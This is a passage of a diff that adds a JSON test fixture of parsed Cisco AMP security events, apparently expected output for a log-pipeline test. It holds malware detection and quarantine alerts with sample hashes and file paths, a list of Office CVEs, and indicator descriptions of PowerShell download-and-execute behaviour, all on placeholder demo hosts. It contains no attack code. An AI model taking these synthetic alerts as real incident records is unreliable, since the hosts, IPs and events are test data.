found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6411132837046518000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411132837046517762",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-13T15:36:52.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701387740Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6411132837046518000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "detection_id": "6411132837046517761",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-13T15:36:52.000Z",
+            "file": {
+                "name": "11179468.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe",
+                "hash": {
+                    "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701389617Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411132837046518000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.0B965CA8AF-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411132837046517762",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-13T15:36:52.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "5faebef3bb880489195e80e6656ccf442ff7123b",
+                    "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960",
+                    "md5": "84b6f7be5370c1998886214790c6892b"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960",
+                    "84b6f7be5370c1998886214790c6892b",
+                    "5faebef3bb880489195e80e6656ccf442ff7123b"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701391536Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411132837046518000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.0B965CA8AF-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411132837046517761",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"
+                }
+            },
+            "@timestamp": "2021-01-13T10:37:33.000Z",
+            "file": {
+                "name": "WINWORD.EXE",
+                "hash": {
+                    "sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 1,
+                "ingested": "2021-09-12T17:32:35.701393451Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}",
+                "kind": "alert",
+                "start": "2021-01-13T10:37:33.000Z",
+                "action": "Vulnerable Application Detected",
+                "id": "15152998206589",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ],
+                        "cve": [
+                            "CVE-2014-0260",
+                            "CVE-2014-1761",
+                            "CVE-2014-6357",
+                            "CVE-2015-0085",
+                            "CVE-2015-0086",
+                            "CVE-2015-1641",
+                            "CVE-2015-1650",
+                            "CVE-2015-1682",
+                            "CVE-2015-2379",
+                            "CVE-2015-2380",
+                            "CVE-2015-2424",
+                            "CVE-2016-0127",
+                            "CVE-2016-7193",
+                            "CVE-2017-0292",
+                            "CVE-2017-11826"
+                        ]
+                    },
+                    "vulnerabilities": [
+                        {
+                            "name": "Microsoft Office",
+                            "score": "9.3",
+                            "cve": "CVE-2014-0260",
+                            "version": "2013",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761",
+                            "cve": "CVE-2014-1761"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357",
+                            "cve": "CVE-2014-6357"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085",
+                            "cve": "CVE-2015-0085"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086",
+                            "cve": "CVE-2015-0086"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641",
+                            "cve": "CVE-2015-1641"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650",
+                            "cve": "CVE-2015-1650"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682",
+                            "cve": "CVE-2015-1682"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379",
+                            "cve": "CVE-2015-2379"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380",
+                            "cve": "CVE-2015-2380"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424",
+                            "cve": "CVE-2015-2424"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127",
+                            "cve": "CVE-2016-0127"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193",
+                            "cve": "CVE-2016-7193"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292",
+                            "cve": "CVE-2017-0292"
+                        },
+                        {
+                            "score": "9.3",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826",
+                            "cve": "CVE-2017-11826"
+                        }
+                    ],
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296279
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-13T10:23:35.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:35.701395327Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6508159571352093000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"
+                }
+            },
+            "@timestamp": "2021-01-13T10:13:13.000Z",
+            "file": {
+                "name": "PowerShell.exe",
+                "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe",
+                "hash": {
+                    "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701397204Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-13T10:13:13.000Z",
+                "action": "Cloud IOC",
+                "id": "1515298360312529000",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "38:1e:eb:ba:2c:15",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "38:1e:eb:ba:2c:15"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.PowershellDownloadedExecutable.ioc",
+                        "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"
+                }
+            },
+            "@timestamp": "2021-01-13T10:13:08.000Z",
+            "file": {
+                "name": "PowerShell.exe",
+                "path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe",
+                "hash": {
+                    "sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP"
+                ],
+                "hash": [
+                    "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP",
+                "hostname": "Demo_AMP"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:35.701399064Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious 